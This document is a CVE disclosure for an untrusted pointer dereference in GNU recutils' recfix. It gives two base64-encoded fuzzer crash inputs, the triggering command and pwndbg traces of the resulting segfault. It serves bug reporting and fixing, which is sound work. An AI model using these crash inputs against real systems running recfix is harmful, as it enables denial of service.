CVE-2021-46019: Untrusted Pointer Dereference in rec_db_destroy()

# Untrusted Pointer Dereference in rec_db_destroy() at rec-db.c:812

## Description

An Untrusted Pointer Dereference was discovered in rec_db_destroy() at rec-db.c:812. The vulnerability causes a segmentation fault and application crash.

**version**

ea03fdaf84860488e6aa09f40cfbaeca8c02fb03

```
recfix --version
recfix (GNU recutils) 1.8.90

Copyright © 2010-2020 Jose E. Marchesi.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html\.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by Jose E. Marchesi.
```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

### poc1

**poc**

```
base64 poc
IyBGU0QucmVjIC0gUmVjb3IgRlNEIGVudHJpZXMKIwojIFRoaXMgZmlsZSBjb250YWlucyB0aGUg
cmVjb3JkIGRlc2NyaXB0b3IgZm9yIGVudHJpZXMgaW4gdGhlIEZyZWUKIyBTb2Z0d2FyZSBEaXJl
Y3RvcnkuCiMKIyBUaGUgY2Fub25pY2FsIGxvY2F0aW9uIG9mIHRoaXMgZmlsZSBpcwojIGh0dHA6
Ly93d3cuamVtYXJjaC5uZXQvZG93bmxvYWRzL0ZTRC5yZWMKCiMgQ29weXJpZ2h0IChDKSAyMDEw
IEpvc2UgRS4gTWFyY2hlc2kKCiMgbGhpcyBwcm9ncmFtIGlzIGZyZWUgc29mdHR5cGV3YXJlOiB5
b3UgY2FuIHJlZGlzdHJpYnV0ZSBpdCJhbmQvb3IgbW9kaWZ5CiMgaXQgdW5kZXIgdGhlIHRlcm1z
IG9mIHRoZSBHTlUgR2VuZXJhbCBQxWJsTWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkKIyB0aG0g
RnJlZSBTb2Z0d2FyZSBGb3VuZGF0aW9uLCBlaXRoZXIgdmVyc2lvbiAzIG9mIHRoZSBMaWNlbnNl
LCBvcgojIChhdCB5b3VyIG9wdGlvbikgYW55IGxhdGVyIHZlcnNpb24uCiMKIyBUaGlzIHByb2dy
YW0gaXMgZGlzdHJpYnV0ZWQgaW4gdGhlIGhvcGUgdHVhdCBpdCB3IGJvb2wKJXR5cGU6IE1hdHVy
aXR5V0lUSE9VVCBBTlkgV0FSUkFOVFk7IHdpdGhvdXQgZXZlbiB0aGUgaW1wbGllZCB3YXJyYW50
eSBvZgojIE1FUkNIQU5UQUJJTElUWSBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VMQVIgUFVSUE9T
RS4gIFNlZSB0aGUKIyBQTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBmb3IgbW9yZSBkZXRhaWxz
LgojCiMgWW91IHNob3VsZCBoYXZlIHJlY2VpdmVkIGEgY29weSBvZiB0aGUgR05VIEdlbmVyYWwg
UHVibGljIExpY2Vuc2UKIyBhbG90eXBlaXRoIHRoaXMgcHJvZ3JhbS4gIElmIG5vdCwgc2VlIDxo
dHRwOi8vd3d3LmdudS5vcmcvbGljZW5zZXMvPi4KCiVyZWM6IEZTRF9FbnRyeQolbWFuZGF0b3J5
OiBUaXRsZQoldHlwZTogVGl0bGUgbGluZQoldHlwZTogR05VIGJvb2wKJXR5cGU6IE1hdHVyaXRy
TGV2ZWwgZW51bQorIFVuZGVmaW5lZCBQbGFubmluZyBQcmVBbHBoYSBBbHBoYSBCZXRhCisgUHJv
ZHVjdGlvbiBNYXR1cmUgT3JwaGFuZWQKJXR5cGU6IExpY2Vuc2hvcGUgdGhhdCBQTHYyIEdQTHYy
UExVUyBHUEx2MyBHUEx2M1BMVVMKKyBHRkRMdjIxUExVUwoldHlwZTogCW50ZXJmYWNlU3R5bGUg
ZW51bQorIENvbW1hbmRMaW5lIENvbnNvbGUgRHRvcnlhZW1vbiBYV2luZG93IFdlYiBFbWFpbAoK
IyBF//90eXBlRlNELnJlSQo=
```

**command:**

```
./recfix --auto ./poc
```

**Result**

```
./recfix --auto ./poc
./poc: 36: error: expected a record
[1] 372631 segmentation fault ./recfix --auto ./poc
```

**gdb**

break rec_db_destroy

```
pwndbg>
0x00007ffff7f1d65d 799 ((const struct gl_list_impl_base *) list)->vtable->list_free (list);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────
*RAX 0x55555557be40 ◂— ‘/usr/share/locale-langpack/en.utf8/LC_MESSAGES/recutils.mo’
RBX 0x0
RCX 0x3
RDX 0x555555585c80 —▸ 0x55555558fb50 ◂— 0x0
RDI 0x555555579b80 —▸ 0x55555557be40 ◂— ‘/usr/share/locale-langpack/en.utf8/LC_MESSAGES/recutils.mo’
RSI 0x555555579bd0 —▸ 0x555555585c80 —▸ 0x55555558fb50 ◂— 0x0
R8 0x2
R9 0x0
R10 0x7ffff7f0c942 ◂— ‘rec_aggregate_reg_destroy’
R11 0x7ffff7f2b810 (rec_aggregate_reg_destroy) ◂— endbr64
R12 0x0
R13 0x0
R14 0x7fffffffe030 ◂— 0x0
R15 0x0
RBP 0x555555579b60 ◂— 0x1
RSP 0x7fffffffe000 —▸ 0x7fffffffe4f5 ◂— ‘/home/aidai/fuzzing/recutils/fuckresults/fuckfix/??-gl_list_free/id:000021,sig:11,src:000003,op:havoc,rep:16’
*RIP 0x7ffff7f1d65d (rec_db_destroy+29) ◂— call qword ptr [rax + 0x98]
───────────────────────────────────────────[ DISASM ]────────────────────────────────────────────
0x7ffff7f1d64a <rec_db_destroy+10> mov rbp, rdi
0x7ffff7f1d64d <rec_db_destroy+13> mov rdi, qword ptr [rdi + 0x10]
0x7ffff7f1d651 <rec_db_destroy+17> call rec_aggregate_reg_destroy@plt <rec_aggregate_reg_destroy@plt>

0x7ffff7f1d656 <rec_db_destroy+22> mov rdi, qword ptr [rbp + 8]
0x7ffff7f1d65a <rec_db_destroy+26> mov rax, qword ptr [rdi]
► 0x7ffff7f1d65d <rec_db_destroy+29> call qword ptr [rax + 0x98] <0>

0x7ffff7f1d663 <rec_db_destroy+35> mov rdi, rbp
0x7ffff7f1d666 <rec_db_destroy+38> pop rbp
0x7ffff7f1d667 <rec_db_destroy+39> jmp free@plt free@plt

0x7ffff7f1d66c <rec_db_destroy+44> nop dword ptr [rax]
0x7ffff7f1d670 <rec_db_destroy+48> ret
────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────
In file: /home/aidai/fuzzing/recutils/recutils/lib/gl_list.h
794 }
795
796 GL_LIST_INLINE void
797 gl_list_free (gl_list_t list)
798 {
► 799 ((const struct gl_list_impl_base *) list)->vtable->list_free (list);
800 }
801
802 GL_LIST_INLINE gl_list_iterator_t
803 gl_list_iterator (gl_list_t list)
804 {
────────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe000 —▸ 0x7fffffffe4f5 ◂— ‘/home/aidai/fuzzing/recutils/fuckresults/fuckfix/??-gl_list_free/id:000021,sig:11,src:000003,op:havoc,rep:16’
01:0008│ 0x7fffffffe008 —▸ 0x555555559af8 (recutl_read_db_from_file+120) ◂— add rsp, 8
02:0010│ 0x7fffffffe010 ◂— 0x0
03:0018│ 0x7fffffffe018 —▸ 0x7fffffffe1f8 —▸ 0x7fffffffe4c1 ◂— ‘/home/aidai/fuzzing/recutils/test/bin/recfix’
04:0020│ 0x7fffffffe020 —▸ 0x55555556fa3c ◂— 0xfffe93fdfffe9409
05:0028│ 0x7fffffffe028 —▸ 0x55555555900c (main+652) ◂— mov r15, rax
06:0030│ r14 0x7fffffffe030 ◂— 0x0
07:0038│ 0x7fffffffe038 —▸ 0x7ffff7b89789 ◂— ‘selinuxfs’
──────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
► f 0 0x7ffff7f1d65d rec_db_destroy+29
f 1 0x7ffff7f1d65d rec_db_destroy+29
f 2 0x555555559af8 recutl_read_db_from_file+120
f 3 0x55555555900c main+652
f 4 0x55555555900c main+652
f 5 0x7ffff7d3b0b3 __libc_start_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 0x00007ffff7f1d65d in gl_list_free (list=0x555555579b80) at …/lib/gl_list.h:799
#1 rec_db_destroy (db=0x555555579b60) at rec-db.c:816
#2 0x0000555555559af8 in recutl_read_db_from_file (file_name=0x7fffffffe4f5 “/home/aidai/fuzzing/recutils/fuckresults/fuckfix/??-gl_list_free/id:000021,sig:11,src:000003,op:havoc,rep:16”) at recutl.c:366
#3 0x000055555555900c in recfix_do_auto () at recfix.c:488
#4 main (argc=argc@entry=3, argv=argv@entry=0x7fffffffe1f8) at recfix.c:488
#5 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558d80 <main>, argc=3, argv=0x7fffffffe1f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1e8) at …/csu/libc-start.c:308
#6 0x00005555555591be in _start () at recfix.c:267
pwndbg> c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────
RAX 0x55555557be40 ◂— ‘/usr/share/locale-langpack/en.utf8/LC_MESSAGES/recutils.mo’
RBX 0x0
RCX 0x3
RDX 0x555555585c80 —▸ 0x55555558fb50 ◂— 0x0
RDI 0x555555579b80 —▸ 0x55555557be40 ◂— ‘/usr/share/locale-langpack/en.utf8/LC_MESSAGES/recutils.mo’
RSI 0x555555579bd0 —▸ 0x555555585c80 —▸ 0x55555558fb50 ◂— 0x0
R8 0x2
R9 0x0
R10 0x7ffff7f0c942 ◂— ‘rec_aggregate_reg_destroy’
R11 0x7ffff7f2b810 (rec_aggregate_reg_destroy) ◂— endbr64
R12 0x0
R13 0x0
R14 0x7fffffffe030 ◂— 0x0
R15 0x0
RBP 0x555555579b60 ◂— 0x1
*RSP 0x7fffffffdff8 —▸ 0x7ffff7f1d663 (rec_db_destroy+35) ◂— mov rdi, rbp
*RIP 0x0
───────────────────────────────────────────[ DISASM ]────────────────────────────────────────────
Invalid address 0x0

────────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdff8 —▸ 0x7ffff7f1d663 (rec_db_destroy+35) ◂— mov rdi, rbp
01:0008│ 0x7fffffffe000 —▸ 0x7fffffffe4f5 ◂— ‘/home/aidai/fuzzing/recutils/fuckresults/fuckfix/??-gl_list_free/id:000021,sig:11,src:000003,op:havoc,rep:16’
02:0010│ 0x7fffffffe008 —▸ 0x555555559af8 (recutl_read_db_from_file+120) ◂— add rsp, 8
03:0018│ 0x7fffffffe010 ◂— 0x0
04:0020│ 0x7fffffffe018 —▸ 0x7fffffffe1f8 —▸ 0x7fffffffe4c1 ◂— ‘/home/aidai/fuzzing/recutils/test/bin/recfix’
05:0028│ 0x7fffffffe020 —▸ 0x55555556fa3c ◂— 0xfffe93fdfffe9409
06:0030│ 0x7fffffffe028 —▸ 0x55555555900c (main+652) ◂— mov r15, rax
07:0038│ r14 0x7fffffffe030 ◂— 0x0
──────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
► f 0 0x0
f 1 0x7ffff7f1d663 rec_db_destroy+35
f 2 0x7ffff7f1d663 rec_db_destroy+35
f 3 0x555555559af8 recutl_read_db_from_file+120
f 4 0x55555555900c main+652
f 5 0x55555555900c main+652
f 6 0x7ffff7d3b0b3 __libc_start_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 0x0000000000000000 in ?? ()
#1 0x00007ffff7f1d663 in gl_list_free (list=<optimized out>) at …/lib/gl_list.h:799
#2 rec_db_destroy (db=0x555555579b60) at rec-db.c:816
#3 0x0000555555559af8 in recutl_read_db_from_file (file_name=0x7fffffffe4f5 “/home/aidai/fuzzing/recutils/fuckresults/fuckfix/??-gl_list_free/id:000021,sig:11,src:000003,op:havoc,rep:16”) at recutl.c:366
#4 0x000055555555900c in recfix_do_auto () at recfix.c:488
#5 main (argc=argc@entry=3, argv=argv@entry=0x7fffffffe1f8) at recfix.c:488
#6 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558d80 <main>, argc=3, argv=0x7fffffffe1f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1e8) at …/csu/libc-start.c:308
#7 0x00005555555591be in _start () at recfix.c:267
```

### poc2

**poc**

```
base64 poc
IyBGU0QuZSBBIC0gUmVjb3IgRlNEIIdudHJlY2NlbnNWaC8+LgoKJXJlYzoARlNEX0VucyB0aGUQ
cmVjb3JkICBTb2Z0d2FyZSBEaXJlY3Rvcnl0cmllY2Vuc2VzLz4uCgolcmVjOgBGU0RfRW5zIHRo
IHRoaXMgZmlsdENvbnNvbGUgRGFlbW9uIFhubG9hAXMvRlNELnJlYwoKIyBDb3B5ZXNpJwojIFRo
aXJlYzcjIyMjIyMjIyMjIyMjIyMjcDovL3dxdy5qZW1hcmNoLm5ldC9kb3dubG9hRjpzav90d2Fy
ZTogeW91IGNhbiByZWRpWnRyaWJ1dGUgaXQgYW5kL29yaWZ5CiMgaXQgdW5VZXIKdGhyZWNlIHRl
cmxzIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTKpjZW5zZSBhcyBwdWJsaXNoZWQgYnkKIyB0
aGUgRnJlZT1Tb2Z0kGFuZSBGb3Vuf2F0aW9uLCBlaXRoZXJlMTJpY2Vuc2UsIG9yCiMgKGF0IHlv
dYYgb3R5dG9yeXBlcI9pb24pIGFueSBscHRlciB2ZXJzaW9uLgojCiMOVGhpcyBwcm9ncmFtIGlz
IGSrq6urq6urq6urq6urq6urq6urq6urq6urq6sgT1IxQSBQQWZUp20KKyBZWVlZWVVsZGVmaW5l
ZCBQbGFubmlgWXIgbW9yZSBkZXRhaWxzLgojCiMgWUx1IHNob3VsZCBocHZlIHJlY2VpdiBHZW5l
cmFsIFB1YmxzYyBMaWNlbnNlCiMgYWxvbmcgd2l0aCB0aGlzAAP9/mcAAAAgICBJZiBub3QsIHNl
ZSI8aHR0cCAvL3d3dy5nTXUbb3I+LgoKJXJlYzoAaWNlbnNlLGcvbGljZW5zZXMvPi4KCiVyZWM6
AEZTRF9FYXRyeQolYXRlCjZ0eVplVSBUaXRsZRRsaW5lCgAAAH9lA+hHTlUgYn9vbAondHlwZTog
TVVuZGVmaW5lZCBQbGFubmluZ3BlIHRoYXQgdG9yeWl0IGEKKyBQcm9kdWN0cmVjIE1hdHVmZSBP
cnBoYWVlZAolAXl0eXBlaWNlbnNlNmVudW0KKyBHUEx2MiBHUEwuMtBdVVMgR1BMRXR5cGVMdjNQ
TFVTCisgR0ZETHYyMVBMVVMKJXR5cGU6IAludGVyZmFjZVN0eWxlIGVudW0KKyBDb21tYW5kTGlu
ZSBDb25zb2xlIERhZW1vbiBYV19uZG93IFdlYiBFbWFpbBoKIyBFbmQgb2YgRlMF//8FYwo=
```

**command:**

```
./recfix --auto ./poc
```

**Result**

```
./recfix --auto ./poc
./poc: 8: error: expected a record
[1] 4190685 segmentation fault ./recfix --auto ./poc
```

**gdb**

break rec_db_destroy

```
pwndbg>
0x00007ffff7f1d65d 799 ((const struct gl_list_impl_base *) list)->vtable->list_free (list);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────
*RAX 0x6168732f7273752f (‘/usr/sha’)
RBX 0x0
RCX 0x1
RDX 0x0
RDI 0x555555579b80 ◂— ‘/usr/share/locale-langpack/en_US/LC_MESSAGES/recutils.mo’
RSI 0x555555579bd0 ◂— 0x0
R8 0x0
R9 0x0
R10 0x7ffff7f0c942 ◂— ‘rec_aggregate_reg_destroy’
R11 0x7ffff7f2b810 (rec_aggregate_reg_destroy) ◂— endbr64
R12 0x0
R13 0x0
R14 0x7fffffffe020 ◂— 0x0
R15 0x0
RBP 0x555555579b60 ◂— 0x1
RSP 0x7fffffffdff0 —▸ 0x7fffffffe4e8 ◂— ‘/home/aidai/fuzzing/recutils/fuckresults/fuckfix/gl_list_free-rec_db_destroy/id:000035,sig:11,src:000260,op:havoc,rep:128’
*RIP 0x7ffff7f1d65d (rec_db_destroy+29) ◂— call qword ptr [rax + 0x98]
───────────────────────────────────────────[ DISASM ]────────────────────────────────────────────
0x7ffff7f1d64a <rec_db_destroy+10> mov rbp, rdi
0x7ffff7f1d64d <rec_db_destroy+13> mov rdi, qword ptr [rdi + 0x10]
0x7ffff7f1d651 <rec_db_destroy+17> call rec_aggregate_reg_destroy@plt <rec_aggregate_reg_destroy@plt>

0x7ffff7f1d656 <rec_db_destroy+22> mov rdi, qword ptr [rbp + 8]
0x7ffff7f1d65a <rec_db_destroy+26> mov rax, qword ptr [rdi]
► 0x7ffff7f1d65d <rec_db_destroy+29> call qword ptr [rax + 0x98]

0x7ffff7f1d663 <rec_db_destroy+35> mov rdi, rbp
0x7ffff7f1d666 <rec_db_destroy+38> pop rbp
0x7ffff7f1d667 <rec_db_destroy+39> jmp free@plt free@plt

0x7ffff7f1d66c <rec_db_destroy+44> nop dword ptr [rax]
0x7ffff7f1d670 <rec_db_destroy+48> ret
────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────
In file: /home/aidai/fuzzing/recutils/recutils/lib/gl_list.h
794 }
795
796 GL_LIST_INLINE void
797 gl_list_free (gl_list_t list)
798 {
► 799 ((const struct gl_list_impl_base *) list)->vtable->list_free (list);
800 }
801
802 GL_LIST_INLINE gl_list_iterator_t
803 gl_list_iterator (gl_list_t list)
804 {
────────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdff0 —▸ 0x7fffffffe4e8 ◂— ‘/home/aidai/fuzzing/recutils/fuckresults/fuckfix/gl_list_free-rec_db_destroy/id:000035,sig:11,src:000260,op:havoc,rep:128’
01:0008│ 0x7fffffffdff8 —▸ 0x555555559af8 (recutl_read_db_from_file+120) ◂— add rsp, 8
02:0010│ 0x7fffffffe000 ◂— 0x0
03:0018│ 0x7fffffffe008 —▸ 0x7fffffffe1e8 —▸ 0x7fffffffe4b4 ◂— ‘/home/aidai/fuzzing/recutils/test/bin/recfix’
04:0020│ 0x7fffffffe010 —▸ 0x55555556fa3c ◂— 0xfffe93fdfffe9409
05:0028│ 0x7fffffffe018 —▸ 0x55555555900c (main+652) ◂— mov r15, rax
06:0030│ r14 0x7fffffffe020 ◂— 0x0
07:0038│ 0x7fffffffe028 —▸ 0x7ffff7b89789 ◂— ‘selinuxfs’
──────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
► f 0 0x7ffff7f1d65d rec_db_destroy+29
f 1 0x7ffff7f1d65d rec_db_destroy+29
f 2 0x555555559af8 recutl_read_db_from_file+120
f 3 0x55555555900c main+652
f 4 0x55555555900c main+652
f 5 0x7ffff7d3b0b3 __libc_start_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 0x00007ffff7f1d65d in gl_list_free (list=0x555555579b80) at …/lib/gl_list.h:799
#1 rec_db_destroy (db=0x555555579b60) at rec-db.c:816
#2 0x0000555555559af8 in recutl_read_db_from_file (file_name=0x7fffffffe4e8 “/home/aidai/fuzzing/recutils/fuckresults/fuckfix/gl_list_free-rec_db_destroy/id:000035,sig:11,src:000260,op:havoc,rep:128”) at recutl.c:366
#3 0x000055555555900c in recfix_do_auto () at recfix.c:488
#4 main (argc=argc@entry=3, argv=argv@entry=0x7fffffffe1e8) at recfix.c:488
#5 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558d80 <main>, argc=3, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at …/csu/libc-start.c:308
#6 0x00005555555591be in _start () at recfix.c:267
pwndbg> si

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7f1d65d in gl_list_free (list=0x555555579b80) at …/lib/gl_list.h:799
799 ((const struct gl_list_impl_base *) list)->vtable->list_free (list);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────
RAX 0x6168732f7273752f (‘/usr/sha’)
RBX 0x0
RCX 0x1
RDX 0x0
RDI 0x555555579b80 ◂— ‘/usr/share/locale-langpack/en_US/LC_MESSAGES/recutils.mo’
RSI 0x555555579bd0 ◂— 0x0
R8 0x0
R9 0x0
R10 0x7ffff7f0c942 ◂— ‘rec_aggregate_reg_destroy’
R11 0x7ffff7f2b810 (rec_aggregate_reg_destroy) ◂— endbr64
R12 0x0
R13 0x0
R14 0x7fffffffe020 ◂— 0x0
R15 0x0
RBP 0x555555579b60 ◂— 0x1
RSP 0x7fffffffdff0 —▸ 0x7fffffffe4e8 ◂— ‘/home/aidai/fuzzing/recutils/fuckresults/fuckfix/gl_list_free-rec_db_destroy/id:000035,sig:11,src:000260,op:havoc,rep:128’
RIP 0x7ffff7f1d65d (rec_db_destroy+29) ◂— call qword ptr [rax + 0x98]
───────────────────────────────────────────[ DISASM ]────────────────────────────────────────────
0x7ffff7f1d64a <rec_db_destroy+10> mov rbp, rdi
0x7ffff7f1d64d <rec_db_destroy+13> mov rdi, qword ptr [rdi + 0x10]
0x7ffff7f1d651 <rec_db_destroy+17> call rec_aggregate_reg_destroy@plt <rec_aggregate_reg_destroy@plt>

0x7ffff7f1d656 <rec_db_destroy+22> mov rdi, qword ptr [rbp + 8]
0x7ffff7f1d65a <rec_db_destroy+26> mov rax, qword ptr [rdi]
► 0x7ffff7f1d65d <rec_db_destroy+29> call qword ptr [rax + 0x98]

0x7ffff7f1d663 <rec_db_destroy+35> mov rdi, rbp
0x7ffff7f1d666 <rec_db_destroy+38> pop rbp
0x7ffff7f1d667 <rec_db_destroy+39> jmp free@plt free@plt

0x7ffff7f1d66c <rec_db_destroy+44> nop dword ptr [rax]
0x7ffff7f1d670 <rec_db_destroy+48> ret
────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────
In file: /home/aidai/fuzzing/recutils/recutils/lib/gl_list.h
794 }
795
796 GL_LIST_INLINE void
797 gl_list_free (gl_list_t list)
798 {
► 799 ((const struct gl_list_impl_base *) list)->vtable->list_free (list);
800 }
801
802 GL_LIST_INLINE gl_list_iterator_t
803 gl_list_iterator (gl_list_t list)
804 {
────────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdff0 —▸ 0x7fffffffe4e8 ◂— ‘/home/aidai/fuzzing/recutils/fuckresults/fuckfix/gl_list_free-rec_db_destroy/id:000035,sig:11,src:000260,op:havoc,rep:128’
01:0008│ 0x7fffffffdff8 —▸ 0x555555559af8 (recutl_read_db_from_file+120) ◂— add rsp, 8
02:0010│ 0x7fffffffe000 ◂— 0x0
03:0018│ 0x7fffffffe008 —▸ 0x7fffffffe1e8 —▸ 0x7fffffffe4b4 ◂— ‘/home/aidai/fuzzing/recutils/test/bin/recfix’
04:0020│ 0x7fffffffe010 —▸ 0x55555556fa3c ◂— 0xfffe93fdfffe9409
05:0028│ 0x7fffffffe018 —▸ 0x55555555900c (main+652) ◂— mov r15, rax
06:0030│ r14 0x7fffffffe020 ◂— 0x0
07:0038│ 0x7fffffffe028 —▸ 0x7ffff7b89789 ◂— ‘selinuxfs’
──────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
► f 0 0x7ffff7f1d65d rec_db_destroy+29
f 1 0x7ffff7f1d65d rec_db_destroy+29
f 2 0x555555559af8 recutl_read_db_from_file+120
f 3 0x55555555900c main+652
f 4 0x55555555900c main+652
f 5 0x7ffff7d3b0b3 __libc_start_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
```